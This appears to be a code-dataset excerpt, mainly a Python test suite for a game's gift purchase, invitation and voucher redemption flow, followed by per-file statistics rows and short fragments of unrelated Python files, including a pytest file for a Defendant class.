self.assert_logged_in(response)
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
vouchers = gamestate['user']['vouchers']
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
found_chips = self.chips_for_path(['user', 'vouchers', '*'])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.ADD)
self.assertEqual(found_chips[0]['value']['voucher_key'], VOUCHER_KEY_S1_GIFT)
# Verify that the product that delivers this voucher is no longer available for the recipient.
self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'])
self.assertEqual(len(found_chips), 0)
found_chips = self.chips_for_path(['user', 'shop', 'available_products', PRODUCT_KEY_S1])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.DELETE)
self.assertEqual(found_chips[0]['path'][-1], PRODUCT_KEY_S1)
# Attempting to redeem the gift again should be an error.
response = self.app.get(gift.url_gift_redeem())
self.assertTrue('gift has already been redeemed' in response)
self.assertTrue(gift.url_gift_redeem_new_user() not in response)
response = self.app.get(gift.url_gift_redeem_new_user())
self.assertTrue('gift has already been redeemed' in response)
def test_admin_gift_redeem_existing(self):
# Create an admin gift as the 'testuser@example.com' admin user.
with db.commit_or_rollback(self.get_ctx()) as ctx:
with db.conn(ctx) as ctx:
admin_user = self.get_logged_in_user(ctx=ctx)
self.make_user_admin(admin_user)
gift = admin.create_admin_gift_of_type(ctx, admin_user, gift_types.GFT_S1_PASS, "Testing Gift")
# Check the lazy loaded fields for the GiftRedeemed subclass.
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
self.assertEqual(gift.creator.user_id, sender.user_id)
self.assertIsNone(gift.redeemer)
# Check the lazy loaded name and description.
product = sender.shop.available_products[PRODUCT_KEY_S1]
self.assertEqual(gift.name, product.name)
self.assertEqual(gift.description, product.description)
# Logout the admin user
self.logout_user()
# Create an existing user and login as them.
self.create_user('existing@example.com', 'pw')
response = self.app.get(gift.url_gift_redeem())
response = response.click(href=gift.url_gift_redeem_existing_user())
form = response.forms['form_login']
form['login_email'].value = "existing@example.com"
form['login_password'] = "pw"
response = form.submit()
response = response.follow()
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
vouchers = gamestate['user']['vouchers']
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
found_chips = self.chips_for_path(['user', 'vouchers', '*'])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.ADD)
self.assertEqual(found_chips[0]['value']['voucher_key'], VOUCHER_KEY_S1_GIFT)
# Verify that the product that delivers this voucher is no longer available for the recipient.
self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'])
self.assertEqual(len(found_chips), 0)
found_chips = self.chips_for_path(['user', 'shop', 'available_products', PRODUCT_KEY_S1])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.DELETE)
self.assertEqual(found_chips[0]['path'][-1], PRODUCT_KEY_S1)
# Attempting to redeem the gift again should be an error.
response = self.app.get(gift.url_gift_redeem())
self.assertTrue('gift has already been redeemed' in response)
self.assertTrue(gift.url_gift_redeem_existing_user() not in response)
response = self.app.get(gift.url_gift_redeem_existing_user())
self.assertTrue('gift has already been redeemed' in response)
# Check the lazy loaded fields for the GiftRedeemed subclass.
redeemer = self.get_logged_in_user()
self.assertEqual(len(redeemer.gifts_created), 0)
self.assertEqual(len(redeemer.gifts_redeemed), 1)
gift = redeemer.gifts_redeemed.values()[0]
self.assertEqual(gift.creator.user_id, sender.user_id)
self.assertEqual(gift.redeemer.user_id, redeemer.user_id)
self.assertEqual(redeemer.campaign_name, "")
# And check the lazy loaded fields for the GiftCreated now that they are all populated.
self.logout_user()
self.login_user("testuser@example.com", "pw")
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_redeemed), 0)
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
self.assertEqual(gift.creator.user_id, sender.user_id)
self.assertEqual(gift.redeemer.user_id, redeemer.user_id)
# Test buying a gift which sends an invitation and is redeemed by a new user.
def test_buy_gift_with_invitation_new_user(self):
response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_last_name=INVITE_LAST_NAME)
# Grab the post purchase gamestate.
gamestate = self.get_gamestate()
# A new purchased product of the expected type should exist.
self.assertEqual(len(gamestate['user']['shop']['purchased_products']), 1)
product = gamestate['user']['shop']['purchased_products'].values()[0]
self.assertEqual(product['product_key'], PRODUCT_KEY_S1_GIFT)
found_chips = self.chips_for_path(['user', 'shop', 'purchased_products', '*'], response)
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.ADD)
self.assertEqual(found_chips[0]['value']['product_key'], PRODUCT_KEY_S1_GIFT)
# An invitation should have been sent with a gift attached.
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
# Verify that the truncation code in the validation step worked.
self.assertEqual(invitations.values()[0]['recipient_last_name'], INVITE_LAST_NAME_TRUNCATED)
invite = invitations.values()[0]
# The gift is not put into the gamestate so check the model object itself.
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_created), 1)
self.assertEqual(len(sender.gifts_redeemed), 0)
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNone(invite_model.accepted_at)
gift = invite_model.gift
self.assertEqual(gift.creator_id, sender.user_id)
self.assertFalse(gift.was_redeemed())
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Verify some of the expected data was inserted into the email body.
self.assertEqual(INVITE_EMAIL, email.email_to)
self.assertTrue(INVITE_FIRST_NAME in email.body_html)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender as we are creating a new user.
self.logout_user()
# Follow the accept invite URL as a not logged in user which should show a choice of whether
# to redeem the gift for a new or existing user.
response = self.app.get(invite_accept_url)
# The inviters first name should be shown in the template to explain to the user who invited them.
self.assertTrue(sender.first_name in response)
# Select the redeem for new user option.
response = response.click(href=gift.url_gift_redeem_new_user())
# Assert the invite code is in the page.
self.assertTrue('Invitation Code' in response)
# And signup the user using the invite provided data and a user supplied password.
form = response.forms['form_signup']
# These fields should have been filled out.
self.assertEqual(form['signup_email'].value, INVITE_EMAIL)
self.assertEqual(form['first_name'].value, INVITE_FIRST_NAME)
self.assertEqual(form['last_name'].value, INVITE_LAST_NAME_TRUNCATED)
form['signup_password'] = "pw"
response = form.submit()
response = response.follow()
# The new user should redirect back to / and since they are not authorized (haven't followed the backdoor link),
# they should see the rover program is full message.
response = response.follow()
self.assertEqual(urls.auth_signup_complete(), response.request.path)
self.assertTrue('No Available Rovers' in response)
# Verify the recipient was created but still has not validated.
self.logout_user()
response = self.login_user(INVITE_EMAIL, 'pw')
response = response.follow() # Redirect from / to /capacity
self.assertEqual(urls.auth_signup_complete(), response.request.path)
self.assertTrue("No Available Rovers" in response)
# Now login as the recipient and go through the validation process.
recipient = self.get_logged_in_user()
response = self.app.get(recipient.url_validate())
self.assertTrue("Account Authenticated" in response)
response = self.app.get(urls.ops())
self.assertEqual(urls.ops(), response.request.path)
self.assert_logged_in(response)
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
vouchers = gamestate['user']['vouchers']
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
# Verify that the product that delivers this voucher is no longer available for the recipient.
self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
# Verify the senders invite was accepted.
sender = self.get_user_by_email(sender.email)
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNotNone(invite_model.accepted_at)
# Test buying a gift which sends an invitation and is redeemed by an existing user.
def test_buy_gift_with_invitation_existing_user(self):
# NOTE: More extensive testing of the purchasing system is provided in test_buy_gift_with_invitation_new_user.
response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_last_name=INVITE_LAST_NAME)
# An invitation should have been sent with a gift attached.
gamestate = self.get_gamestate()
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
# Verify that the truncation code in the validation step worked.
self.assertEqual(invitations.values()[0]['recipient_last_name'], INVITE_LAST_NAME_TRUNCATED)
invite = invitations.values()[0]
# The gift is not put into the gamestate so check the model object itself.
sender = self.get_logged_in_user()
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNone(invite_model.accepted_at)
gift = invite_model.gift
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Verify some of the expected data was inserted into the email body.
self.assertEqual(INVITE_EMAIL, email.email_to)
self.assertTrue(INVITE_FIRST_NAME in email.body_html)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender as we are going to signup a new user to be the redeemer.
self.logout_user()
EXISTING_EMAIL = 'testexisting@example.com'
# Create and login as a new user which will be the 'existing' user.
self.create_user(EXISTING_EMAIL, 'pw')
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Follow the accept invite URL as the logged in user which should STILL show a choice of whether
# to redeem the gift for a new or existing user.
response = self.app.get(invite_accept_url)
# The inviters first name should be shown in the template to explain to the user who invited them.
self.assertTrue(sender.first_name in response)
# Select the redeem for existing user option.
response = response.click(href=gift.url_gift_redeem_existing_user())
# And login as the existing user.
form = response.forms['form_login']
form['login_email'] = EXISTING_EMAIL
form['login_password'] = "pw"
response = form.submit()
# The new user should redirect back to / and since they are authorized should redirect to ops.
response = response.follow() # Follow redirect to /
response = response.follow() # Follow redirect to /ops
self.assertEqual(urls.ops(), response.request.path)
self.assert_logged_in(response)
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
self.assertTrue(gamestate['user']['email'], EXISTING_EMAIL)
vouchers = gamestate['user']['vouchers']
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
# Verify that the product that delivers this voucher is no longer available for the recipient.
self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
self.assertTrue(PRODUCT_KEY_ALL in gamestate['user']['shop']['available_products'])
# Verify the senders invite was accepted.
sender = self.get_user_by_email(sender.email)
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNotNone(invite_model.accepted_at)
# Test redeeming multiple gifts, especially to check the user.current_voucher_level changes.
def test_redeem_multiple_gifts(self):
# Check the initial gamestate.
gamestate = self.get_gamestate()
self.assertEqual(len(gamestate['user']['vouchers']), 0)
self.assertIsNone(gamestate['user']['current_voucher_level'])
self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testuser@example.com")
gift_s1 = self.get_logged_in_user().gifts_created.values()[0]
self.purchase_gift(PRODUCT_KEY_ALL_GIFT, recipient_email="testuser@example.com")
gift_all = [g for g in self.get_logged_in_user().gifts_created.values() if g.gift_id != gift_s1.gift_id][0]
# Redeem the S1 gift.
response = self.app.get(gift_s1.url_gift_redeem())
response = response.click(href=gift_s1.url_gift_redeem_existing_user())
form = response.forms['form_login']
form['login_email'].value = "testuser@example.com"
form['login_password'] = "pw"
response = form.submit()
response = response.follow()
# A voucher should have been delivered.
gamestate = self.get_gamestate()
self.assertEqual(len(gamestate['user']['vouchers']), 1)
self.assertTrue(VOUCHER_KEY_S1 in gamestate['user']['vouchers'])
# And the current_voucher_level should have changed.
self.assertEqual(gamestate['user']['current_voucher_level'], VOUCHER_KEY_S1)
found_chips = self.chips_for_path(['user'])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.MOD)
self.assertEqual(found_chips[0]['value']['current_voucher_level'], VOUCHER_KEY_S1)
# Clear chips
self.advance_now(minutes=10)
# Redeem the ALL gift.
response = self.app.get(gift_all.url_gift_redeem())
response = response.click(href=gift_all.url_gift_redeem_existing_user())
form = response.forms['form_login']
form['login_email'].value = "testuser@example.com"
form['login_password'] = "pw"
response = form.submit()
response = response.follow()
# Another voucher should have been delivered.
gamestate = self.get_gamestate()
self.assertEqual(len(gamestate['user']['vouchers']), 2)
self.assertTrue(VOUCHER_KEY_ALL in gamestate['user']['vouchers'])
# And the current_voucher_level should have changed.
self.assertEqual(gamestate['user']['current_voucher_level'], VOUCHER_KEY_ALL)
found_chips = self.chips_for_path(['user'])
self.assertEqual(len(found_chips), 1)
self.assertEqual(found_chips[0]['action'], chips.MOD)
self.assertEqual(found_chips[0]['value']['current_voucher_level'], VOUCHER_KEY_ALL)
# Test purchasing multiple gifts, which are repurchased product objects.
def test_buy_multiple_gifts(self):
sender = self.get_logged_in_user()
self.assertEqual(len(sender.shop.purchased_products), 0)
self.assertEqual(len(sender.gifts_created), 0)
self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testrecipient1@example.com")
self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="testrecipient2@example.com")
sender = self.get_logged_in_user()
self.assertEqual(len(sender.shop.purchased_products), 2)
self.assertEqual(len(sender.gifts_created), 2)
# Test buying a gift and redeeming it as the creator.
def test_buy_gift_with_invitation_to_self(self):
response = self.purchase_gift(PRODUCT_KEY_S1_GIFT)
sender = self.get_logged_in_user()
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNone(invite_model.accepted_at)
sender_id = sender.user_id
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
# Grab the post purchase gamestate.
gamestate = self.get_gamestate()
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender to be sure logging in as them works.
self.logout_user()
# Follow the accept invite URL as a not logged in user.
response = self.app.get(invite_accept_url)
# Select the redeem for a new user option, however we will sign in as the existing.
response = response.click(href=gift.url_gift_redeem_new_user())
form = response.forms['form_signup']
# These fields should have been filled out.
self.assertEqual(form['signup_email'].value, INVITE_EMAIL)
self.assertEqual(form['first_name'].value, INVITE_FIRST_NAME)
# Fill out the signup form with the senders valid, existing user credentials.
form['signup_email'] = "testuser@example.com"
form['signup_password'] = "pw"
response = form.submit()
response = response.follow()
user_id = self.assert_logged_in(response)
# Verify got logged in as the sender.
self.assertEqual(user_id, sender_id)
# Verify the sender who became the recipient got the voucher for the gift.
vouchers = self.get_gamestate()['user']['vouchers']
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
# Verify the senders invite was accepted.
sender = self.get_user_by_email(sender.email)
self.assertEqual(len(sender.invitations), 1)
invite_model = sender.invitations.values()[0]
self.assertIsNotNone(invite_model.accepted_at)
# Test that a user created via an invitation (so has a user.inviter_id) who then receives another
# invitation with a gift who then redeems that gift+invite for their existing account doesn't have their
# inviter_id replaced and that the second invite is still mark as accepted. (in earlier versions of the schema
# before invites could have gift attachments there was a unique constraint on invitations.recipient_id that
# prevented this behavior from working.)
def test_redeem_invite_gift_from_invited_user(self):
# Create two admin invites (with gifts) as the 'testuser@example.com' admin user.
with db.commit_or_rollback(self.get_ctx()) as ctx:
with db.conn(ctx) as ctx:
admin_user = self.get_logged_in_user(ctx=ctx)
admin_user_id = admin_user.user_id
self.make_user_admin(admin_user)
invite_params = {
'recipient_email': INVITE_EMAIL, 'recipient_first_name': INVITE_FIRST_NAME,
'recipient_last_name': INVITE_LAST_NAME_TRUNCATED, 'recipient_message': "Hello and welcome"
}
invite1 = admin.send_admin_invite_with_gift_type(ctx, admin_user, invite_params,
gift_types.GFT_S1_PASS, "Testing Admin Invite+Gift")
gift1 = invite1.gift
invite2 = admin.send_admin_invite_with_gift_type(ctx, admin_user, invite_params,
gift_types.GFT_ALL_PASS, "Testing Admin Invite+Gift")
gift2 = invite2.gift
self.logout_user()
# Sign up a new user with the first invite.
response = self.app.get(invite1.url_invite_accept())
# Select the redeem for a new user option.
response = response.click(href=gift1.url_gift_redeem_new_user())
# Accept the invite as the new user.
form = response.forms['form_signup']
form['signup_password'] = "pw"
response = form.submit()
response = response.follow()
# Now login as the recipient and go through the validation process.
self.logout_user()
self.login_user(INVITE_EMAIL, 'pw')
self.app.get(self.get_logged_in_user().url_validate())
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
self.assertTrue(VOUCHER_KEY_S1_GIFT in gamestate['user']['vouchers'])
# Now accept the second invite and gift, but login to the existing account when redeeming.
response = self.app.get(invite2.url_invite_accept())
# Select the redeem for a existing user option.
response = response.click(href=gift2.url_gift_redeem_existing_user())
# Accept the invite as the existing user.
form = response.forms['form_login']
form['login_email'] = INVITE_EMAIL
form['login_password'] = "pw"
response = form.submit()
response = response.follow()
# Verify the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
self.assertTrue(VOUCHER_KEY_ALL_GIFT in gamestate['user']['vouchers'])
recipient = self.get_logged_in_user()
# Verify both the admin inviter invites were accepted.
with db.commit_or_rollback(self.get_ctx()) as ctx:
with db.conn(ctx) as ctx:
admin_inviter = admin.get_admin_inviter_user(ctx)
# The inviter_id for the new user should point back at the admin inviter user (Turing) who
# was the inviter.
self.assertEqual(recipient.inviter_id, admin_inviter.user_id)
self.assertEqual(len(admin_inviter.invitations), 2)
invite_model = admin_inviter.invitations.values()[0]
self.assertIsNotNone(invite_model.accepted_at)
self.assertEqual(invite_model.recipient_id, recipient.user_id)
# But the gift creator_id should be the real human admin user who created the gifts/invites.
self.assertEqual(invite_model.gift.creator_id, admin_user_id)
self.assertEqual(invite_model.gift.redeemer_id, recipient.user_id)
invite_model = admin_inviter.invitations.values()[1]
self.assertIsNotNone(invite_model.accepted_at)
self.assertEqual(invite_model.recipient_id, recipient.user_id)
self.assertEqual(invite_model.gift.creator_id, admin_user_id)
self.assertEqual(invite_model.gift.redeemer_id, recipient.user_id)
# Test that redeeming a gift when the user already has that voucher is an error.
def test_cannot_redeem_gift_if_have_voucher(self):
charge = ChargeAlwaysSuccess(FAKE_CHARGE_ID_1)
self.shop_stripe_purchase_products(product_keys=[PRODUCT_KEY_S1], save_card=False, charge=charge)
self.purchase_gift(PRODUCT_KEY_S1_GIFT)
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
# Grab the post purchase gamestate.
gamestate = self.get_gamestate()
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
vouchers = gamestate['user']['vouchers']
self.assertEqual(len(vouchers), 1)
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender as we are going to accept the invite with their credentials.
self.logout_user()
# Follow the accept invite URL as a not logged in user.
response = self.app.get(invite_accept_url)
# Select the redeem for a existing user option.
response = response.click(href=gift.url_gift_redeem_existing_user())
form = response.forms['form_login']
form['login_email'] = "testuser@example.com"
form['login_password'] = "pw"
response = form.submit()
# Attempting to redeem this gift should be an error shown on the page to the user since they already
# have the voucher this gift was going to deliver.
self.assertTrue('You cannot redeem this gift.' in response)
self.login_user("testuser@example.com", "pw")
# Verify nothing changed.
gamestate = self.get_gamestate()
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
vouchers = gamestate['user']['vouchers']
self.assertEqual(len(vouchers), 1)
self.assertTrue(VOUCHER_KEY_S1_GIFT in vouchers)
# Test that redeeming the s1 gift when the user already has the all voucher is denied.
def test_cannot_redeem_s1_gift_if_have_all_voucher(self):
charge = ChargeAlwaysSuccess(FAKE_CHARGE_ID_1)
self.shop_stripe_purchase_products(product_keys=[PRODUCT_KEY_ALL], save_card=False, charge=charge)
self.purchase_gift(PRODUCT_KEY_S1_GIFT)
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
# Grab the post purchase gamestate.
invitations = self.get_gamestate()['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender as we are going to accept the invite with their credentials.
self.logout_user()
response = self.app.get(invite_accept_url)
# Select the redeem for a existing user option.
response = response.click(href=gift.url_gift_redeem_existing_user())
form = response.forms['form_login']
# Fill out the signup form with the senders valid, existing user credentials.
form['login_email'] = "testuser@example.com"
form['login_password'] = "pw"
response = form.submit()
# Attempting to redeem this gift should be an error shown on the page to the user since they already
# have the ALL voucher which supersedes the voucher this gift was going to deliver.
self.assertTrue('You cannot redeem this gift.' in response)
self.login_user("testuser@example.com", "pw")
# Verify nothing changed.
gamestate = self.get_gamestate()
invitations = gamestate['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
vouchers = gamestate['user']['vouchers']
self.assertEqual(len(vouchers), 1)
self.assertTrue(VOUCHER_KEY_ALL in vouchers)
self.assertTrue(VOUCHER_KEY_S1_GIFT not in vouchers)
# Test that receiving the ALL gift makes the S1 pass product unavailable.
def test_buy_gift_all_removes_s1_pass(self):
response = self.purchase_gift(PRODUCT_KEY_ALL_GIFT)
sender = self.get_logged_in_user()
self.assertEqual(len(sender.gifts_created), 1)
gift = sender.gifts_created.values()[0]
# Pull the accept invite URL out of the invitation email (verifying it is present in the email body)
invitations = self.get_gamestate()['user']['invitations']
self.assertEqual(len(invitations), 1)
invite = invitations.values()[0]
email = self._get_invite_accept_email()
invite_accept_url = re.search(invite['urls']['invite_accept'], email.body_html).group(0)
# Advance past the invite creation chips etc. are empty.
self.advance_game(minutes=10)
# Logout the sender as we are creating a new user.
self.logout_user()
# Follow the accept invite URL as a not logged in user.
response = self.app.get(invite_accept_url)
# Select the redeem for a new user option.
response = response.click(href=gift.url_gift_redeem_new_user())
# Accept the invite as the new user.
form = response.forms['form_signup']
form['signup_password'] = "pw"
response = form.submit()
response = response.follow()
# Now login as the recipient and go through the validation process.
self.logout_user()
self.login_user(INVITE_EMAIL, 'pw')
self.app.get(self.get_logged_in_user().url_validate())
# Verify the sender who became the recipient got the voucher for the gift.
gamestate = self.get_gamestate()
self.assertTrue(VOUCHER_KEY_ALL_GIFT in gamestate['user']['vouchers'])
# And verify the S1 product is not available (and also the ALL product is gone too).
self.assertTrue(PRODUCT_KEY_S1 not in gamestate['user']['shop']['available_products'])
self.assertTrue(PRODUCT_KEY_ALL not in gamestate['user']['shop']['available_products'])
# Test that purchasing a gift invitation does not decrement invites_left.
def test_buy_gift_no_change_in_invites_left(self):
self.set_user_invites_left(1)
self.assertEqual(self.get_logged_in_user().invites_left, 1)
self.purchase_gift(PRODUCT_KEY_S1_GIFT)
self.assertEqual(self.get_logged_in_user().invites_left, 1)
# Test trying to purchase a gift invitation with a bad email address.
def test_buy_gift_bad_email(self):
response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email="invalid&domain", status=400)
self.assertTrue("Invalid email address" in response['errors'][0])
# Test trying to purchase a gift invitation with missing values.
def test_buy_gift_missing_data(self):
# recipient_email is missing.
response = self.purchase_gift(PRODUCT_KEY_S1_GIFT, recipient_email=None, status=400)
self.assertTrue("Missing required field: recipient_email" in response['errors'][0])
def _get_invite_accept_email(self):
invite_emails = [e for e in self.get_sent_emails() if "Invitation" in e.subject]
self.assertTrue(len(invite_emails) == 1)
return invite_emails[0]
| 52.364029
| 120
| 0.683978
| 4,799
| 36,393
| 4.987289
| 0.078766
| 0.061419
| 0.034595
| 0.013788
| 0.817498
| 0.789504
| 0.759004
| 0.730509
| 0.710872
| 0.697042
| 0
| 0.007269
| 0.221279
| 36,393
| 694
| 121
| 52.439481
| 0.837262
| 0.239414
| 0
| 0.706897
| 0
| 0
| 0.093445
| 0.006573
| 0
| 0
| 0
| 0
| 0.342672
| 1
| 0.034483
| false
| 0.036638
| 0.021552
| 0
| 0.060345
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
eb96e0546666e71ed158a5520e5f9eff31a050f4
| 151
|
py
|
Python
|
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
hknweb/events/forms/__init__.py
|
jyxzhang/hknweb
|
a01ffd8587859bf63c46213be6a0c8b87164a5c2
|
[
"MIT"
] | null | null | null |
from hknweb.events.forms.event import EventForm, EventUpdateForm
from hknweb.events.forms.attendance import AttendanceFormForm, AttendanceResponseForm
| 50.333333
| 85
| 0.880795
| 16
| 151
| 8.3125
| 0.6875
| 0.150376
| 0.240602
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066225
| 151
| 2
| 86
| 75.5
| 0.943262
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6949b98c4ca077d235b10ad7b57a0de58d6e5811
| 211
|
py
|
Python
|
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | null | null | null |
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | 3
|
2020-05-27T13:00:45.000Z
|
2020-09-29T12:42:23.000Z
|
bblogger/__init__.py
|
lohmega/jamble
|
ca7d2788c584cfb1c86ae766d06f6a9d57a60974
|
[
"Apache-2.0"
] | null | null | null |
from bblogger.ble import scan, BlueBerryClient
from bblogger.deserialize import BlueBerryDeserializer
from bblogger.defs import SENSORS, PASSCODE_STATUS, enum2str
from bblogger.__version__ import __version__
| 26.375
| 60
| 0.862559
| 24
| 211
| 7.208333
| 0.583333
| 0.277457
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005291
| 0.104265
| 211
| 7
| 61
| 30.142857
| 0.910053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
696cae170c6faf2c21341a0a1ca3ef2d7f2af3f4
| 8,837
|
py
|
Python
|
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
test/test_defendant.py
|
khelsabeck/felony_records_nc
|
f0dfa065329727df0ce2976d812bcf4c37d0bb1b
|
[
"MIT"
] | null | null | null |
from src.defendant import Defendant
import pytest
from datetime import date, datetime, timedelta
import typing
@pytest.fixture
def d1():
d1 = Defendant("John", "Smith", date(2010,1, 1))
return d1
def test_initialization():
'''This tests an initialization with valid data.'''
my_defendant = Defendant("John", "Smith", date(2010,1, 1))
assert "John" == my_defendant._first
assert "John" == my_defendant.first
assert "Smith" == my_defendant._last
assert "Smith" == my_defendant.last
assert date(2010,1, 1) == my_defendant._birthdate
assert date(2010,1, 1) == my_defendant.birthdate
def test_set_first_over25():
'''This tests that only the first 25 chars of a first name are included'''
my_defendant = Defendant("aaaaaaaaaaaaaaaaaaaaaaaabc", "Smith", date(2010,1, 1))
assert "aaaaaaaaaaaaaaaaaaaaaaaab" == my_defendant._first
assert "aaaaaaaaaaaaaaaaaaaaaaaab" == my_defendant.first
def test_set_first_noncontiguous():
'''This tests that a non-contiguous string for a first name yields the appropriate error.'''
with pytest.raises(Exception) as exc_info:
my_defendant = Defendant("a a", "Smith", date(2010,1, 1))
exception_raised = exc_info.value
assert type(ValueError()) == type(exception_raised)
